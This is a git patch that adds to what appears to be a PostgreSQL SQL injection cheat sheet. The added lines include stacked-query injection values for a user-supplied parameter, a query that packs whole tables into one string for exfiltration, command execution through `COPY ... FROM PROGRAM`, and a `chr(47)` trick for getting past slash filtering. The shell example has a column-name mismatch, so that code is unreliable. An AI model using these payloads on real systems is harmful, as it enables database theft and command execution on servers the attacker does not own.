From dfe56b4c377dcf4e93b633089a09f753c0ff6c30 Mon Sep 17 00:00:00 2001
From: Mahmood Azadi <90643392+libertyir@users.noreply.github.com>
Date: Sat, 18 Sep 2021 18:13:59 +0430
Subject: [PATCH] Update Postgres_SqlInjecttions.sql

---
 Postgres_SqlInjecttions.sql | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)

diff --git a/Postgres_SqlInjecttions.sql b/Postgres_SqlInjecttions.sql
index 4452337..fc25099 100644
--- a/Postgres_SqlInjecttions.sql
+++ b/Postgres_SqlInjecttions.sql
@@ -45,6 +45,36 @@ select (table_name || ' : ' || (select string_agg(column_name, ',') from informa
 --| table2 : field1                |
 ------------------------------------
 
+--Multiple Select Table in single text
+--*************************************************
+-- Field1 int,field2 text,field3 datetime
+select string_agg(cast(COALESCE(txt1,'')  as text) , '<br>') from (select cast(COALESCE(field1,'0')  as text) || ',' || cast(COALESCE(field2,'')  as text) || ',' || cast(COALESCE(field3,now())  as text) as txt1 from table1) as tbl1
+
+
+--execute command delete/update/exec/function in command 
+--*************************************************
+-- orginal select * from table1 where field1 = $input
+-- $input = '; select 1;exec sp_1; select fn_test(''); --
+
+
+-- orginal select * from (select * from table1 where field1 = $input group by field2)
+-- $input =  group by field2'; select 1;exec sp_1; select fn_test(''); select * from table1 where 1=2 and ''='
+
+
+--Shell Execute
+--*************************************************
+Create table pg_test (cmdr text);
+COPY pg_test (command_output) FROM PROGRAM 'echo 123';
+select cmdr from pg_test
+
+
+--bypass / and \ in url 
+--*************************************************
+select replace('ls !', '!',chr(47))
+
+
+
+